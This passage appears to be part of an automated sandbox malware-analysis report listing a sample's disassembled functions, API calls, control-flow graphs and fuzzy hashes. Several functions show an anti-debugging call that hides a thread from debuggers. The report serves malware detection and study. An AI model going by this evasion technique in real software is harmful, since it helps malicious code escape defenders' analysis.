8079->8084 8080->8064 8081->8074 8085 6c0a40cb-6c0a40d4 8081->8085 8086 6c0a3f69 8082->8086 8087 6c0a4069-6c0a406c 8083->8087 8088 6c0a40f5-6c0a413f 8083->8088 8084->8074 8085->8084 8091 6c0a40d6-6c0a40f0 8085->8091 8086->8080 8089 6c0a4072-6c0a4077 8087->8089 8090 6c0a4144-6c0a414b 8087->8090 8088->8086 8089->8082 8090->8080 8091->8083
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 95f25a630cec715fcbae76dde6e96dcace934cc5af6f5f996d2d49af1c2a5636
                              • Instruction ID: 0150066158d90c9b169bb73df025db986f5fc10ef639a488303d54b3c53de651
                              • Opcode Fuzzy Hash: 95f25a630cec715fcbae76dde6e96dcace934cc5af6f5f996d2d49af1c2a5636
                              • Instruction Fuzzy Hash: 2451DF711547018FC320CFA8C880785B7E3BF99314F698A5DC0E65BA96DB75B44BCB41
                              Function 6C0A39CF Relevance: 3.1, APIs: 2, Instructions: 139threadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: 30a02efbc8b9040dd50b473cbc8cf753d7492869692532900d736b06b8a1a10c
                              • Instruction ID: 1f78c51edcfab52e32089f55a80f9a7a8666bb714da0b80642495719479c5c3e
                              • Opcode Fuzzy Hash: 30a02efbc8b9040dd50b473cbc8cf753d7492869692532900d736b06b8a1a10c
                              • Instruction Fuzzy Hash: 5751D171514B018BC320CFE8C48079AB7E3BF99314F698A1DC0E65BA96DB71B44BCB91
                              Function 6C0A3D18 Relevance: 3.1, APIs: 2, Instructions: 89threadnativeCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C0A3E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C0A3EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: b4a539c0f58effc4df311dc2d6538bc913274ad0fabd94adcadc1a375da21696
                              • Instruction ID: c881dda3b95cd9afb7d0f6b79a7f271e8e944a3cb55c12570fdf39606276ff94
                              • Opcode Fuzzy Hash: b4a539c0f58effc4df311dc2d6538bc913274ad0fabd94adcadc1a375da21696
                              • Instruction Fuzzy Hash: 18310331115B01CBC720CFE4C8847CAB7E3AF9A314F698A1DC0E65BA92DB75B00A9B51
                              Function 6C0A3D62 Relevance: 3.1, APIs: 2, Instructions: 83threadnativeCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C0A3E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C0A3EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: 61b2ce54b9420a43dc8af62e47d408c127e04543c7d39d7ff1c21a07d8a81528
                              • Instruction ID: c29e77db883da7e74f2fe51f1502e7cc781b6c0be238b1b4f156756f17c62b5f
                              • Opcode Fuzzy Hash: 61b2ce54b9420a43dc8af62e47d408c127e04543c7d39d7ff1c21a07d8a81528
                              • Instruction Fuzzy Hash: 8B31F331114701CBC724CFE8C49079AB7E7AF9A304F654E1DC0E65BA96DB71B446CB91
                              Function 6C0A3C62 Relevance: 3.1, APIs: 2, Instructions: 72threadnativeCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentThread.KERNEL32 ref: 6C0A3E9D
                              • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C0A3EAA
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Thread$CurrentInformation
                              • String ID:
                              • API String ID: 1650627709-0
                              • Opcode ID: c9af61170ad605ded199556893e910db5632914d60a591d48025576f9da9440c
                              • Instruction ID: dac5790766abd458da8e4f3fd50a1e81208daf140eedf89b155ea12362fbbb76
                              • Opcode Fuzzy Hash: c9af61170ad605ded199556893e910db5632914d60a591d48025576f9da9440c
                              • Instruction Fuzzy Hash: 13212470118701DBC724CFE4C89079AB7F6AF8A304F644A1DC0E68BAD2DF75B40A9B52
                              Function 6C225120 Relevance: 3.1, APIs: 2, Instructions: 72COMMON
                              Download Yara Rule
                              APIs
                              • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6C225130
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ManagerOpen
                              • String ID:
                              • API String ID: 1889721586-0
                              • Opcode ID: d8643c20d75e9d86550136a2571cbf9daeb948cb28e38c4b71e7c38f958d0f00
                              • Instruction ID: dd683c2e98fb03538cb6ead6a93a74daed24fb304fc6b45b881b0f62211e253e
                              • Opcode Fuzzy Hash: d8643c20d75e9d86550136a2571cbf9daeb948cb28e38c4b71e7c38f958d0f00
                              • Instruction Fuzzy Hash: B0312AB4608346EFD710CF28C544B1ABBF0EB89755F50896EF888C6364C379C9459B53
                              Function 6C21AEC0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                              Download Yara Rule
                              APIs
                              • FindFirstFileA.KERNEL32(?,?), ref: 6C21AEDC
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileFindFirst
                              • String ID:
                              • API String ID: 1974802433-0
                              • Opcode ID: cb14118e0b088aa6f02425ff232c7706d1f6a86f93137225212225e7e3b6b16f
                              • Instruction ID: 56a760b02de19ce24964b67e7195bf327407ba814726fe753ba8392a87e02dd7
                              • Opcode Fuzzy Hash: cb14118e0b088aa6f02425ff232c7706d1f6a86f93137225212225e7e3b6b16f
                              • Instruction Fuzzy Hash: FC1136B450C355EFD7108B28D54490EBBE4BF86325F148E5AF9A8CBA91D335CC888B62
                              Function 6C1FAA30 Relevance: 44.5, APIs: 3, Strings: 22, Instructions: 734fileCOMMON
                              Download Yara Rule
                              APIs
                              • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C1FABA7
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID: $53N!$53N!$H$I_#]$J_#]$J_#]$Y<Uq$Y<Uq$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$\|n/$f@n`$f@n`$jinc$|
                              • API String ID: 2738559852-1563143607
                              • Opcode ID: b24f039fb7170313fb1cfe26954c05f4ab6bf82100ea86e6be43c3fd7029137a
                              • Instruction ID: 482f91a11a9d2dbfb2db402a37c2f093516bae9bbff77b3d878a972b7cf5b504
                              • Opcode Fuzzy Hash: b24f039fb7170313fb1cfe26954c05f4ab6bf82100ea86e6be43c3fd7029137a
                              • Instruction Fuzzy Hash: 8662597060D3818FC725CF18C490A5ABBE2AFDA314F248D5EE9A9CB751D739D8468B43
                              Function 6C23CAD3 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6824 6c23cad3-6c23cae3 6825 6c23cae5-6c23caf8 call 6c22f9df call 6c22f9cc 6824->6825 6826 6c23cafd-6c23caff 6824->6826 6842 6c23ce7c 6825->6842 6828 6c23cb05-6c23cb0b 6826->6828 6829 6c23ce64-6c23ce71 call 6c22f9df call 6c22f9cc 6826->6829 6828->6829 6832 6c23cb11-6c23cb37 6828->6832 6848 6c23ce77 call 6c230120 6829->6848 6832->6829 6835 6c23cb3d-6c23cb46 6832->6835 6838 6c23cb60-6c23cb62 6835->6838 6839 6c23cb48-6c23cb5b call 6c22f9df call 6c22f9cc 6835->6839 6840 6c23ce60-6c23ce62 6838->6840 6841 6c23cb68-6c23cb6b 6838->6841 6839->6848 6845 6c23ce7f-6c23ce82 6840->6845 6841->6840 6847 6c23cb71-6c23cb75 6841->6847 6842->6845 6847->6839 6850 6c23cb77-6c23cb8e 6847->6850 6848->6842 6853 6c23cb90-6c23cb93 6850->6853 6854 6c23cbdf-6c23cbe5 6850->6854 6857 6c23cba3-6c23cba9 6853->6857 6858 6c23cb95-6c23cb9e 6853->6858 6855 6c23cbe7-6c23cbf1 6854->6855 6856 6c23cbab-6c23cbc2 call 6c22f9df call 6c22f9cc call 6c230120 6854->6856 6859 6c23cbf3-6c23cbf5 6855->6859 6860 6c23cbf8-6c23cc16 call 6c2347f5 call 6c2347bb * 2 6855->6860 6888 6c23cd97 6856->6888 6857->6856 6862 6c23cbc7-6c23cbda 6857->6862 6861 6c23cc63-6c23cc73 6858->6861 6859->6860 6898 6c23cc33-6c23cc5c call 6c23ac69 6860->6898 6899 6c23cc18-6c23cc2e call 6c22f9cc call 6c22f9df 6860->6899 6864 6c23cc79-6c23cc85 6861->6864 6865 6c23cd38-6c23cd41 call 6c2419e5 6861->6865 6862->6861 6864->6865 6868 6c23cc8b-6c23cc8d 6864->6868 6876 6c23cd43-6c23cd55 6865->6876 6877 6c23cdb4 6865->6877 6868->6865 6873 6c23cc93-6c23ccb7 6868->6873 6873->6865 6878 6c23ccb9-6c23cccf 6873->6878 6876->6877 6882 6c23cd57-6c23cd66 GetConsoleMode 6876->6882 6885 6c23cdb8-6c23cdd0 ReadFile 6877->6885 6878->6865 6883 6c23ccd1-6c23ccd3 6878->6883 6882->6877 6889 6c23cd68-6c23cd6c 6882->6889 6883->6865 6890 6c23ccd5-6c23ccfb 6883->6890 6886 6c23cdd2-6c23cdd8 6885->6886 6887 6c23ce2c-6c23ce37 GetLastError 6885->6887 6886->6887 6894 6c23cdda 6886->6894 6892 6c23ce50-6c23ce53 6887->6892 6893 6c23ce39-6c23ce4b call 6c22f9cc call 6c22f9df 6887->6893 6896 6c23cd9a-6c23cda4 call 6c2347bb 6888->6896 6889->6885 6895 6c23cd6e-6c23cd88 ReadConsoleW 6889->6895 6890->6865 6897 6c23ccfd-6c23cd13 6890->6897 6905 6c23cd90-6c23cd96 call 6c22f9f2 6892->6905 6906 6c23ce59-6c23ce5b 6892->6906 6893->6888 6901 6c23cddd-6c23cdef 6894->6901 6903 6c23cd8a GetLastError 6895->6903 6904 6c23cda9-6c23cdb2 6895->6904 6896->6845 6897->6865 6908 6c23cd15-6c23cd17 6897->6908 6898->6861 6899->6888 6901->6896 6911 6c23cdf1-6c23cdf5 6901->6911 6903->6905 6904->6901 6905->6888 6906->6896 6908->6865 6915 6c23cd19-6c23cd33 6908->6915 6918 6c23cdf7-6c23ce07 call 6c23cefe 6911->6918 6919 6c23ce0e-6c23ce19 6911->6919 6915->6865 6930 6c23ce0a-6c23ce0c 6918->6930 6925 6c23ce25-6c23ce2a call 6c23d1b6 6919->6925 6926 6c23ce1b call 6c23ce83 6919->6926 6931 6c23ce20-6c23ce23 6925->6931 6926->6931 6930->6896 6931->6930
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: 8Q
                              • API String ID: 0-4022487301
                              • Opcode ID: c99e3b399db885dbcc3330eb591389db1cfa699b9be6660133b9b5dec4d7761b
                              • Instruction ID: 3d9be2cacbeff21bedc94ecd00dc09a2bd2a40a6f6c0c221c9930d3104aaa0f0
                              • Opcode Fuzzy Hash: c99e3b399db885dbcc3330eb591389db1cfa699b9be6660133b9b5dec4d7761b
                              • Instruction Fuzzy Hash: EFC138B5A0423E9FDF01EF98C880BADBBB4AF4A714F105259FD18A7781C7749905CB20
                              Function 6C24406C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6933 6c24406c-6c24409c call 6c2444ec 6936 6c2440b7-6c2440c3 call 6c24160c 6933->6936 6937 6c24409e-6c2440a9 call 6c22f9df 6933->6937 6943 6c2440c5-6c2440da call 6c22f9df call 6c22f9cc 6936->6943 6944 6c2440dc-6c244125 call 6c244457 6936->6944 6942 6c2440ab-6c2440b2 call 6c22f9cc 6937->6942 6953 6c244391-6c244395 6942->6953 6943->6942 6951 6c244127-6c244130 6944->6951 6952 6c244192-6c24419b GetFileType 6944->6952 6955 6c244167-6c24418d GetLastError call 6c22f9f2 6951->6955 6956 6c244132-6c244136 6951->6956 6957 6c2441e4-6c2441e7 6952->6957 6958 6c24419d-6c2441ce GetLastError call 6c22f9f2 CloseHandle 6952->6958 6955->6942 6956->6955 6962 6c244138-6c244165 call 6c244457 6956->6962 6960 6c2441f0-6c2441f6 6957->6960 6961 6c2441e9-6c2441ee 6957->6961 6958->6942 6972 6c2441d4-6c2441df call 6c22f9cc 6958->6972 6965 6c2441fa-6c244248 call 6c2417b0 6960->6965 6966 6c2441f8 6960->6966 6961->6965 6962->6952 6962->6955 6976 6c244267-6c24428f call 6c244710 6965->6976 6977 6c24424a-6c244256 call 6c244666 6965->6977 6966->6965 6972->6942 6982 6c244294-6c2442d5 6976->6982 6983 6c244291-6c244292 6976->6983 6977->6976 6984 6c244258 6977->6984 6986 6c2442f6-6c244304 6982->6986 6987 6c2442d7-6c2442db 6982->6987 6985 6c24425a-6c244262 call 6c23b925 6983->6985 6984->6985 6985->6953 6989 6c24438f 6986->6989 6990 6c24430a-6c24430e 6986->6990 6987->6986 6988 6c2442dd-6c2442f1 6987->6988 6988->6986 6989->6953 6990->6989 6992 6c244310-6c244343 CloseHandle call 6c244457 6990->6992 6996 6c244345-6c244371 GetLastError call 6c22f9f2 call 6c24171f 6992->6996 6997 6c244377-6c24438b 6992->6997 6996->6997 6997->6989
                              APIs
                                • Part of subcall function 6C244457: CreateFileW.KERNEL32(00000000,00000000,?,6C244115,?,?,00000000,?,6C244115,00000000,0000000C), ref: 6C244474
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C244180
                              • __dosmaperr.LIBCMT ref: 6C244187
                              • GetFileType.KERNEL32(00000000), ref: 6C244193
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C24419D
                              • __dosmaperr.LIBCMT ref: 6C2441A6
                              • CloseHandle.KERNEL32(00000000), ref: 6C2441C6
                              • CloseHandle.KERNEL32(6C23B0D0), ref: 6C244313
                              • GetLastError.KERNEL32 ref: 6C244345
                              • __dosmaperr.LIBCMT ref: 6C24434C
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                              • String ID: 8Q
                              • API String ID: 4237864984-4022487301
                              • Opcode ID: d8d3d86e5c678d4d77029b92a4bc55af9d9e8f8b3551ac49de6c0e11f25174a0
                              • Instruction ID: 09568a4a4943c1be8a0821f3b022f4da6d2cdbba77989ab5614c047b21de9a54
                              • Opcode Fuzzy Hash: d8d3d86e5c678d4d77029b92a4bc55af9d9e8f8b3551ac49de6c0e11f25174a0
                              • Instruction Fuzzy Hash: 78A13632A1415D9FCF0DCF68C851BAE7BB1AB46329F28825DEC11EB790CB358916CB51
                              Function 6C1FC1E0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 183COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 7002 6c1fc1e0-6c1fc239 call 6c226b70 7005 6c1fc260-6c1fc269 7002->7005 7006 6c1fc26b-6c1fc270 7005->7006 7007 6c1fc2b0-6c1fc2b5 7005->7007 7008 6c1fc272-6c1fc277 7006->7008 7009 6c1fc2f0-6c1fc2f5 7006->7009 7010 6c1fc2b7-6c1fc2bc 7007->7010 7011 6c1fc330-6c1fc335 7007->7011 7014 6c1fc27d-6c1fc282 7008->7014 7015 6c1fc372-6c1fc3df WriteFile 7008->7015 7018 6c1fc2fb-6c1fc300 7009->7018 7019 6c1fc431-6c1fc448 WriteFile 7009->7019 7016 6c1fc407-6c1fc41b 7010->7016 7017 6c1fc2c2-6c1fc2c7 7010->7017 7012 6c1fc33b-6c1fc340 7011->7012 7013 6c1fc489-6c1fc4b9 call 6c22b3a0 7011->7013 7023 6c1fc4be-6c1fc4c3 7012->7023 7024 6c1fc346-6c1fc36d 7012->7024 7013->7005 7025 6c1fc3e9-6c1fc3fd WriteFile 7014->7025 7026 6c1fc288-6c1fc28d 7014->7026 7015->7025 7027 6c1fc41f-6c1fc42c 7016->7027 7028 6c1fc2cd-6c1fc2d2 7017->7028 7029 6c1fc23b-6c1fc250 7017->7029 7020 6c1fc306-6c1fc30b 7018->7020 7021 6c1fc452-6c1fc47f call 6c22b920 ReadFile 7018->7021 7019->7021 7020->7005 7030 6c1fc311-6c1fc32b 7020->7030 7021->7013 7023->7005 7033 6c1fc4c9-6c1fc4d7 7023->7033 7031 6c1fc253-6c1fc258 7024->7031 7025->7016 7026->7005 7034 6c1fc28f-6c1fc2aa 7026->7034 7027->7005 7028->7005 7035 6c1fc2d4-6c1fc2e7 7028->7035 7029->7031 7030->7027 7031->7005 7034->7031 7035->7031
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: :uW$;uW$;uW$> 4!$> 4!
                              • API String ID: 0-4100612575
                              • Opcode ID: ada69674a0efa3539f3e362104820a551bbc5df3713ca8365216207113a52f18
                              • Instruction ID: 931cd33b3188dfbf33e77a9cd6787571f9ed467b7878d0265f162d66b05ec67d
                              • Opcode Fuzzy Hash: ada69674a0efa3539f3e362104820a551bbc5df3713ca8365216207113a52f18
                              • Instruction Fuzzy Hash: C0718DB0208345AFD720DF54C890B9ABBF4FF8A708F10492EF4A8D7650D375D849AB92
                              Function 6C1FB730 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 605COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: K?Jo$K?Jo$`Rlx$7eO
                              • API String ID: 0-174837320
                              • Opcode ID: ce5341f0f52b305241250ba58317db5b08a478a5aa0b5958f1fa40c62f47fc58
                              • Instruction ID: d7c4925664b03cfbb9d87559628e1bfa49452597e06e0ec1a4479540fc2fec31
                              • Opcode Fuzzy Hash: ce5341f0f52b305241250ba58317db5b08a478a5aa0b5958f1fa40c62f47fc58
                              • Instruction Fuzzy Hash: 3C4258B4609342CFC754CF58C090A5ABBE1AFDA314F248E1EE5A587B61D738E846CB53
                              Function 6C0A4200 Relevance: 9.0, APIs: 3, Strings: 1, Instructions: 2005COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                              • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmpDownload File
